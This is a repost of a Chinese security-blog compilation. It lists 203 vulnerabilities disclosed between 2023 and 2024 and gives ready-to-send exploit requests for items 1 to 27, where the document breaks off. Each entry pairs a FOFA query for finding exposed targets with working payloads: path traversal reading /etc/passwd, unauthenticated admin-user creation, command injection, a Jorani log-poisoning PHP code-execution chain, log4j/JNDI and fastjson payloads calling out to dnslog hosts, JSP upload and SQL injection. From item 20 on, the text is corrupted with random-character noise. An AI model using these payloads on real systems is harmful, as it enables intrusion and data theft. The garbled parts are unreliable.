Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全, 2024-06-05 07:41, Beijing
The following article is reproduced from the public account 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of the attacks seen in offensive/defensive exercises, so we hope this article helps with defense. Defenders can use its contents to check their own exposure.

Sources: the article covers 203 PoCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: every vulnerability listed is already public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few PoCs that are too long are replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, search for keywords with F12.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).

Contents
01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. Hongfan (红帆) HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua (大华) ICC intelligent IoT management platform arbitrary file read
21. Dahua (大华) ICC intelligent IoT management platform random remote code execution
22. Dahua (大华) ICC intelligent IoT management platform log4j remote code execution
23. Dahua (大华) ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou (用友) NC registerServlet JNDI remote code execution
26. Yonyou (用友) NC linkVoucher SQL injection
27. Yonyou (用友) NC showcontent SQL injection
28. Yonyou (用友) NC grouptemplet arbitrary file upload
29. Yonyou (用友) NC down/bill SQL injection
30. Yonyou (用友) NC importPml SQL injection
31. Yonyou (用友) NC runStateServlet SQL injection
32. Yonyou (用友) NC complainbilldetail SQL injection
33. Yonyou (用友) NC downTax/download SQL injection
34. Yonyou (用友) NC warningDetailInfo interface SQL injection
35. Yonyou (用友) NC-Cloud importhttpscer arbitrary file upload
36. Yonyou (用友) NC-Cloud soapFormat XXE
37. Yonyou (用友) NC-Cloud IUpdateService XXE
38. Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE
39. Yonyou (用友) U8 Cloud RegisterServlet SQL injection
40. Yonyou (用友) U8-Cloud XChangeServlet XXE
41. Yonyou (用友) U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou (用友) GRP-U8 SmartUpload01 file upload
43. Yonyou (用友) GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou (用友) GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou (用友) GRP-U8 ufgovbank XXE
46. Yonyou (用友) GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou (用友) GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou (用友) U8 CRM swfupload arbitrary file upload
49. Yonyou (用友) U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet (畅捷通) T+ getdecallusers information disclosure
56. Chanjet (畅捷通) T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
70. Wanhu (万户) ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision (海康威视) operations management center session command execution
93. Qi An Xin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin (奇安信) 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS ocean video management system dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload
PoC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace the password value with the MD5 of your own password.

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"

Log in to the admin backend with the default account admin, then send the following request.

POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The upload response contains the path of the uploaded file.

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step 1: obtain the cookie first.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request; the written function executes a base64-encoded command.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the lab target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command.

GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"

The leaked data includes usernames and passwords.

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"

The leaked data includes usernames and passwords.

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. Hongfan (红帆) HFOffice 医微云 SQL injection
FOFA: title="HFOffice"

The PoC calls a function that computes the MD5 of 1234.

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua (大华) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC智能物联综合管理平台任意文件读取4 s* S- q; C* l/ U+ x/ C
FOFA:body="*客户端会小于800*"9 Z) s+ y& Z7 q; f
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
+ f  {3 @3 U$ D# v0 bHost: x.x.x.x  s! [# f. Z4 m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, u! |! X6 I% R  k# O- b' m4 W! LConnection: close
. |4 ~3 e7 P: K6 T1 n1 W9 P1 b# JAccept: */*! O* {3 ]1 h3 T) e3 e
Accept-Language: en
5 G; `+ R, i2 s& u7 \Accept-Encoding: gzip
- M/ y4 G# a) J, Y: e( O& I
1 a5 p- B. W" F' m4 _4 s7 v* d7 {9 F$ J
21. 大华ICC智能物联综合管理平台random远程代码执行- x; R  g8 `2 X& h7 |
FOFA:icon_hash="-1935899595"
; k, T2 N" f/ n0 d/ V9 s9 c; YPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1! R- f* ]6 ^" n+ I& B  i# v; N  S
Host: x.x.x.x
) R; I8 q) R+ |# M# C3 \6 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. ?; d3 E& a. O0 r: ~  d, M5 f+ {" ?Content-Length: 161
( G8 D: w7 e; D" i$ qAccept-Encoding: gzip
- U) J7 f/ \4 p( f' w- OConnection: close$ Q9 {) }/ ]% [+ N
Content-Type: application/json;charset=utf-83 T5 A) W0 T5 Q9 Y3 b8 E4 {
( d4 x8 o1 ^0 c
{
4 F% u! x! }) M6 G$ w"a":{8 ^' r& D4 i+ R% w- r
   "@type":"com.alibaba.fastjson.JSONObject",/ p3 s; N) @: X- m' m8 A, f; N
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
( N# q; X- R+ F1 t- _& ~: X  }""
' _) L( I1 ^9 \. R}
1 H1 Q: r- \# p  I! q# O! ]/ n. b4 o/ G+ o& M9 o9 `

$ o  t2 K5 x/ h4 d  k1 y22. 大华ICC智能物联综合管理平台 log4j远程代码执行- y; G1 J7 d! u1 r( [, E
FOFA:icon_hash="-1935899595"
9 w: U* K. s8 P5 U% F7 B% rPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
3 X3 M) K8 ?# J  m4 UHost: your-ip
; G/ ]* C$ r" B: D( u5 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ s" Y& k* [  x9 t- m# uContent-Type: application/json;charset=utf-8
. o, y, ^* C2 q, O$ }3 j3 t0 M& P" i& z* G. T5 h6 p
{
0 {+ o, `# @+ y' M1 f2 J; P0 U"loginName":"${jndi:ldap://dnslog}"/ y; V. k9 y4 p0 G$ D0 ?+ Q- x* \* c
}
" A: ^* e- Z( K$ t6 x
' A) t+ i# E: |
7 X/ p, O' {3 p
+ g9 u. {0 d' [0 q" f! D23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
% n, k3 x9 h0 B7 f+ g0 I* V9 IFOFA:icon_hash="-1935899595"
" L4 w" J  B+ Q4 x! kPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
1 N5 J3 l# H& e. l, Y# I( {6 F) E8 eHost: your-ip
4 Z. U) A  t$ e2 W0 X3 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  `! g3 z( Y3 [7 N+ f0 F5 YContent-Type: application/json;charset=utf-8# [" H6 g8 P0 d: }- u
Accept-Encoding: gzip$ e0 N' G. _& j
Connection: close
( d2 ]$ u) r+ P6 {/ {- D  ~4 Z% E0 W
{* G; y, M4 x; i- j
    "a":{5 g* V/ H) ~# q' ]; U( [4 @
        "@type":"com.alibaba.fastjson.JSONObject",
0 E( V+ M; [& f2 q( }       {"@type":"java.net.URL","val":"http://DNSLOG"}2 c7 M0 B3 {1 i0 a
        }""+ N/ b. A. p9 o  r
}
. ?, u# z- V5 Y$ h. C! ~5 x0 z5 r, n% q# K8 b% o- _$ G$ I
( ~, Y, T  {  m- L7 K
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
